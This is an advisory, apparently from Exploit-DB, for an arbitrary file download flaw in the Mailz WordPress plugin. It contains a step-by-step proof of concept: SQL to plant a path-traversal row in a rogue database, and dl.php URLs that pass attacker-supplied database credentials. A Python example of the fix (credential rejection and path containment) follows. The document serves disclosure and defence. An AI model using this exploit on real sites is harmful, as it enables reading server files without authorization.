Vendor: Mailz
By: 6Scan security team
CVSS: 8.8 (HIGH)
Vulnerability Type: Arbitrary File Download
CWE: 434
Product Name: Mailz
Affected Version From: < 1.4.2
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:zingiri:mailz
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2011

Mailing List plugin for WordPress Arbitrary file download

Unauthorized users can download arbitrary files from the server using this exploit. The bug is in config.php, but it is reachable through another file. The PoC involves setting up a MySQL database, creating a table with a specific structure, adding a row to it, and calling the script with the database parameters and the id of the file to download.

Mitigation:

Update to version 1.4.2 or later

Exploit-DB raw data:

#Exploit Title: Mailing List plugin for WordPress Arbitrary file download
#Version:  < 1.4.2
#Date: 2011-12-19
#Author: 6Scan (http://6scan.com) security team
#Software Link: http://wordpress.org/extend/plugins/mailz/
#Official fix: This advisory is released after the vendor (http://www.zingiri.com) was contacted and fixed the issue promptly.
#Description: Unauthorized users can download arbitrary files from the server using this exploit.
#             The vulnerable script includes the config.php file, which connects to the database with supplied credentials. Database entries are used to retrieve files from the host.
#             The bug is in config.php, but it is accessible from another file.

PoC
1) Set up a MySQL database
2) Create a table with the following structure:
CREATE TABLE IF NOT EXISTS `phplist_attachment` (
  `filename` varchar(1024) NOT NULL,
  `mimetype` varchar(1024) NOT NULL,
  `remotefile` varchar(1024) NOT NULL,
  `description` varchar(1024) NOT NULL,
  `size` int(11) NOT NULL,
  `id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

3) Add this row to the database:
INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES
('../../../../../somefile.txt', '', '', '', 0, 0);


4) Call the script with database parameters and file id to download:

http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0

The credentials are now saved in session, and there is no need to continue passing them:
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=1
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=2
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=3
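The two checks that close this bug, shown as an added illustration that is not part of the advisory or of the plugin's code: refuse database connection settings arriving in the request, and only serve a stored filename if it resolves inside the attachment directory. Names such as ATTACHMENT_DIR and handle_download are hypothetical, and ATTACHMENTS is a constructed stand-in for the phplist_attachment table, seeded with the traversal row from the PoC.

```python
import os
from typing import Mapping, Optional, Tuple

# Hypothetical location of stored attachments; the real plugin layout is not on the page.
ATTACHMENT_DIR = "/var/www/html/wp-content/uploads/mailz"

# Query parameters the advisory shows carrying database credentials.
CREDENTIAL_PARAMS = ("wph", "wpdb", "user", "wpp")

# Constructed stand-in for the phplist_attachment table (id -> row).
ATTACHMENTS = {
    0: {"filename": "../../../../../somefile.txt"},   # the PoC row
    1: {"filename": "newsletter.pdf"},                 # a legitimate attachment
    2: {"filename": "sub/../../etc/passwd"},           # traversal hidden behind a subdirectory
}


def resolve_attachment(base_dir: str, filename: str) -> Optional[str]:
    """Return the absolute path for filename, or None if it escapes base_dir.

    realpath() normalises '..' segments and symlinks before the containment
    check, so a stored filename cannot steer the download outside base_dir.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def handle_download(params: Mapping[str, str]) -> Tuple[int, str]:
    """Model of a hardened dl.php: returns (HTTP status, path or message)."""
    # Connection settings come from the site configuration only; a request
    # that tries to supply them is rejected instead of being honoured.
    if any(p in params for p in CREDENTIAL_PARAMS):
        return 400, "database parameters are not accepted"
    try:
        row = ATTACHMENTS[int(params.get("id", ""))]
    except (ValueError, KeyError):
        return 404, "no such attachment"
    path = resolve_attachment(ATTACHMENT_DIR, row["filename"])
    if path is None:
        return 403, "attachment path escapes the upload directory"
    return 200, path
```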